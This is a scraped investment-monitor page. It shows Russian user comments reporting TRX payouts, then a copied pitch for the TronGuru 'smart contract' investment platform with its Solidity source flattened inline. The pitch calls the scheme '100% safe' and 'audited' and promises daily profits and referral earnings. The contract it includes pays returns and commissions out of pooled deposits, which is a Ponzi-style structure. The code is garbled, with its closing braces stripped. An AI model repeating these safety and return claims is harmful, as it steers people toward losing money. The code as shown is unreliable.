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Ekaterina Rodina
11381 votes 3 years ago Profit Hunters

Выплата 16 TRX 34e90415f171c7e8f40d07215bc53508b6b5ede25971e760bfd4f285636d7253 2020-12-03 11:55:33 Инвестирую с блогом Profit-Hunters. 

Ekaterina Rodina
11381 votes 3 years ago Profit Hunters

Выплата 20 TRX 06AD28A8931DEF1CB4D4153D54F81DB7B9957D37EDBEF941C594CEB890F146A2 2020-12-02 13:16:03 Инвестирую с блогом Profit-Hunters.

Ekaterina Rodina
11381 votes 3 years ago Profit Hunters

Выплата 20 TRX 1f5b1996c5ddb15f50e1bee7ecdc405735c14ea80f0400ffbe4944b385ee770d 2020-12-01 15:09:51 Инвестирую с блогом Profit-Hunters. 

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+ InvesTracing 37
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Here's what it says on the website:

TronGuru LTD is made by the same core team which runs the best mining company MINEIFY. TronGuru is a separate company registered in the UK with a registration number - 12968944. TronGuru is a leader Smart Contract investment website and can you join us with only a minimum of 100 TRX. TronGuru is made perfectly also for the promoters with very detailed statistics for referrals. A smart contract is a computerized transaction protocol automatically implementing terms of a contract between two parties. It is similar to the common contract as both users have to define rules and terms expected of the participants. Upon initiation of the smart contract, it runs as designed and no alteration can be affected on to it. TronGuru is audited and 100% safe for investments. We have 3 Level Referral commissions. First Level 5%, Second Level 3% and Third level 1%. TronGuru Referral Program is the leading program in the Tron Smart Contract ecosystem. Our target users are promoters and industry leaders who earn money by referrals. Our platform features detailed statistics such as When and Who joins under you-including the timestamp of the referred user join date. To join, start referring and earn with TronGuru, you need to deposit a minimum of 100 TRX to facilitate registration on the blockchain smart contract system. We have plenty of banners under the promo section. You can make videos, invite family and friends, share your referral link online to build your advertising network. Commissions are paid instantly upon request on the platform. contract TronGuru { using SafeMath for uint256; uint256 constant public MinimumInvest = 100 trx; uint256 constant public MarketingFee = 800; uint256 constant public ServiceFee = 300; uint256[] public ReferralCommissions = [500, 300, 100]; uint256 constant public Day = 1 days; uint256 constant public ROICap = 15000; uint256 constant public PercentDiv = 10000; uint256 constant public ContractIncreaseEach = 1000000 trx; uint256 constant public StartBonus = 200; uint256 constant public ContractBonusCap = 100; uint256 constant public HoldBonusCap = 100; uint256 public TotalInvestors; uint256 public TotalInvested; uint256 public TotalWithdrawn; uint256 public TotalDepositCount; uint256 public CurrentBonus; address payable public MarketingFeeAddress; address payable public ServiceFeeAddress; struct Deposit { uint256 amount; uint256 withdrawn; uint256 start; struct Commissions { address Downline; uint256 Earned; uint256 Invested; uint256 Level; uint256 DepositTime; struct User { Deposit[] deposits; Commissions[] commissions; uint256 checkpoint; address upline; uint256 totalinvested; uint256 totalwithdrawn; uint256 totalcommisions; uint256 lvlonecommisions; uint256 lvltwocommisions; uint256 lvlthreecommisions; uint256 availablecommisions; event ReferralBonus(address indexed referrer, address indexed referral, uint256 indexed level, uint256 amount); event NewDeposit(address indexed user, uint256 amount); event Withdrawal(address indexed user, uint256 amount); constructor(address payable MarketingAddress, address payable ServiceAddress) public { require(!isContract(MarketingAddress) && !isContract(ServiceAddress)); MarketingFeeAddress = MarketingAddress; ServiceFeeAddress = ServiceAddress; CurrentBonus = StartBonus; function Invest(address InvestorUpline) public payable { require(msg.value >= MinimumInvest); MarketingFeeAddress.transfer(msg.value.mul(MarketingFee).div(PercentDiv)); ServiceFeeAddress.transfer(msg.value.mul(ServiceFee).div(PercentDiv)); if (user.upline == address(0) && users[InvestorUpline].deposits.length > 0 && InvestorUpline != msg.sender) { user.upline = InvestorUpline; if (user.upline != address(0)) { address upline = user.upline; for (uint256 i = 0; i < 3; i++) { if (upline != address(0)) { uint256 amount = msg.value.mul(ReferralCommissions[i]).div(PercentDiv); users[upline].totalcommisions = users[upline].totalcommisions.add(amount); users[upline].availablecommisions = users[upline].availablecommisions.add(amount); if(i == 0){ users[upline].lvlonecommisions = users[upline].lvlonecommisions.add(amount); if(i == 1){ users[upline].lvltwocommisions = users[upline].lvltwocommisions.add(amount); if(i == 2){ users[upline].lvlthreecommisions = users[upline].lvlthreecommisions.add(amount); users[upline].commissions.push(Commissions(msg.sender, amount, msg.value, i, block.timestamp)); emit ReferralBonus(upline, msg.sender, i, amount); upline = users[upline].upline; } else break; if (user.upline == address(0)) { uint256 advertise = 900; MarketingFeeAddress.transfer(msg.value.mul(advertise).div(PercentDiv)); if (user.deposits.length == 0) { user.checkpoint = block.timestamp; TotalInvestors = TotalInvestors.add(1); user.deposits.push(Deposit(msg.value, 0, block.timestamp)); user.totalinvested = user.totalinvested.add(msg.value); TotalDepositCount = TotalDepositCount.add(1); TotalInvested = TotalInvested.add(msg.value); UpdateContractBonus(); emit NewDeposit(msg.sender, msg.value); function WithdrawCommissions() public { User storage user = users[msg.sender]; uint256 contractBalance = address(this).balance; uint256 toSend; require(user.availablecommisions > 0, "No commissions available"); if (contractBalance < user.availablecommisions) { toSend = contractBalance; user.availablecommisions = user.availablecommisions.sub(toSend); }else{ toSend = user.availablecommisions; user.availablecommisions = 0; msg.sender.transfer(toSend); TotalWithdrawn = TotalWithdrawn.add(toSend); function WithdrawDividends() public { User storage user = users[msg.sender]; uint256 userPercentRate = CurrentBonus.add(GetHoldBonus(msg.sender)); uint256 toSend; uint256 dividends; uint256 ResetHoldBonus; for (uint256 i = 0; i < user.deposits.length; i++) { if (user.deposits[i].withdrawn < ((user.deposits[i].amount.mul(ROICap)).div(PercentDiv))) { if (user.deposits[i].start > user.checkpoint) { dividends = (user.deposits[i].amount.mul(userPercentRate).div(PercentDiv)) .mul(block.timestamp.sub(user.deposits[i].start)) .div(Day); ResetHoldBonus = ResetHoldBonus.add(1); } else { dividends = (user.deposits[i].amount.mul(userPercentRate).div(PercentDiv)) .mul(block.timestamp.sub(user.checkpoint)) .div(Day); ResetHoldBonus = ResetHoldBonus.add(1); if (user.deposits[i].withdrawn.add(dividends) >= ((user.deposits[i].amount.mul(ROICap)).div(PercentDiv))) { dividends = (((user.deposits[i].amount.mul(ROICap)).div(PercentDiv))).sub(user.deposits[i].withdrawn); ResetHoldBonus = 0; user.deposits[i].withdrawn = user.deposits[i].withdrawn.add(dividends); toSend = toSend.add(dividends); uint256 contractBalance = address(this).balance; if (contractBalance < toSend) { toSend = contractBalance; if(ResetHoldBonus != 0){ user.checkpoint = block.timestamp; msg.sender.transfer(toSend); TotalWithdrawn = TotalWithdrawn.add(toSend); user.totalwithdrawn = user.totalwithdrawn.add(toSend); emit Withdrawal(msg.sender, toSend); function GetUserDividends(address userAddress) public view returns (uint256) { User storage user = users[userAddress]; uint256 userPercentRate = CurrentBonus.add(GetHoldBonus(msg.sender)); uint256 totalDividends; uint256 dividends; for (uint256 i = 0; i < user.deposits.length; i++) { if (user.deposits[i].withdrawn < ((user.deposits[i].amount.mul(ROICap)).div(PercentDiv))) { if (user.deposits[i].start > user.checkpoint) { dividends = (user.deposits[i].amount.mul(userPercentRate).div(PercentDiv)) .mul(block.timestamp.sub(user.deposits[i].start)) .div(Day); } else { dividends = (user.deposits[i].amount.mul(userPercentRate).div(PercentDiv)) .mul(block.timestamp.sub(user.checkpoint)) .div(Day); if (user.deposits[i].withdrawn.add(dividends) > ((user.deposits[i].amount.mul(ROICap)).div(PercentDiv))) { dividends = ((user.deposits[i].amount.mul(ROICap)).div(PercentDiv)).sub(user.deposits[i].withdrawn); function ActiveClient(address userAddress) public view returns (bool) { User storage user = users[userAddress]; if (user.deposits.length > 0) { if (user.deposits[user.deposits.length-1].withdrawn < ((user.deposits[user.deposits.length-1].amount.mul(ROICap)).div(PercentDiv))) { return true; function UpdateContractBonus() internal { uint256 contractBalancePercent = TotalInvested.div(ContractIncreaseEach); if(contractBalancePercent > ContractBonusCap){ contractBalancePercent = ContractBonusCap; function GetHoldBonus(address userAddress) public view returns (uint256) { User storage user = users[userAddress]; if (user.checkpoint > 0) { uint256 timeMultiplier = ((now.sub(user.checkpoint)).div(Day)).mul(5); if(timeMultiplier > HoldBonusCap){ timeMultiplier = HoldBonusCap; return timeMultiplier; }else{ return 0; function GetTotalCommission(address userAddress) public view returns(uint256) { User storage user = users[userAddress]; return (user.commissions.length); function GetUserCommission(address userAddress, uint256 index) public view returns(address, uint256, uint256, uint256, uint256) { User storage user = users[userAddress]; return (user.commissions[index].Downline, user.commissions[index].Earned, user.commissions[index].Invested, user.commissions[index].Level, user.commissions[index].DepositTime); function GetUserData(address userAddress) public view returns(address, uint256, uint256, uint256, uint256, uint256, uint256, uint256, uint256) { User storage user = users[userAddress]; return (user.upline, user.totalinvested, user.totalwithdrawn, user.totalcommisions, user.lvlonecommisions, user.lvltwocommisions, user.lvlthreecommisions, user.availablecommisions, user.checkpoint); function GetUserTotalDeposits(address userAddress) public view returns(uint256) { return users[userAddress].deposits.length; function GetUserDepositInfo(address userAddress, uint256 index) public view returns(uint256, uint256, uint256) { User storage user = users[userAddress]; return (user.deposits[index].amount, user.deposits[index].withdrawn, user.deposits[index].start); function GetContractBalance() public view returns (uint256) { return address(this).balance; function isContract(address addr) internal view returns (bool) { uint size; assembly { size := extcodesize(addr) } return size > 0; function fxpMul(uint256 a, uint256 b, uint256 base) internal pure returns (uint256) { return div(mul(a, b), base); function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; function sub(uint256 a, uint256 b) internal pure returns (uint256) { require(b <= a, "SafeMath: subtraction overflow"); uint256 c = a - b; return c; function mul(uint256 a, uint256 b) internal pure returns (uint256) { if (a == 0) { return 0; uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; function div(uint256 a, uint256 b) internal pure returns (uint256) { require(b > 0, "SafeMath: division by zero"); uint256 c = a / b; return c; Our platform is 100% made to serve investors. Our smart contract is built after careful study of pitfalls experienced by other smart contracts to ensure the longevity of our platform. As a user, you should not be worried about infiltration by whales who ruin the earning opportunities of new users. TronGuru is a platform built for everyone to earn. TronGuru is an innovative platform built by leading professionals drawn from the cryptocurrency mining industry and global company Mineify. The code is the #1 Smart contract available in the industry at the moment, its longevity and stability will prove smart contracts are the future of investments. New users are welcome to read and check our different referral plan detail. Earnings are added to your profile in real-time and available for withdrawal anytime. Note: We have enabled the HOLD BONUS feature- if you do not withdraw your balances, it is an opportunity to earn more on the interest of up to 1% with an extra 1% daily profits. Join TronGuru and enjoy daily earnings with the best and biggest investment smart contract website. Here you will be able to view all your wallet statistics including investment portfolio, profits, held bonuses, and contract balance bonuses. Through this interface, you can make withdrawals, investments, and many more. This window gives you access to detailed information relating to your referral statistics. You can view Your Upline, Referral Link (active after a minimum deposit of 100 TRX, All the Rewards in All 3 Levels. TronGuru is the only smart contract platform giving you access to such detailed referral statistics! Refer to as many users as you can and enjoy massive earnings on this wonderful platform. Binance Poloniex We are only working with personal wallets. Please don’t make deposits directly fromthe exchange platforms. If you do so, the payouts will be made to the exchange platform and not to your account - you will lose funds. As such, whenever you want to send TRX payments to our smart-contract address, please route it through your personal wallet. On this page, you will find all the advertising banners available. You can use your referral link to post in various advertising channels such as Telegram groups, social media platforms, or post in your YouTube channel within the description section to earn more referral commissions.
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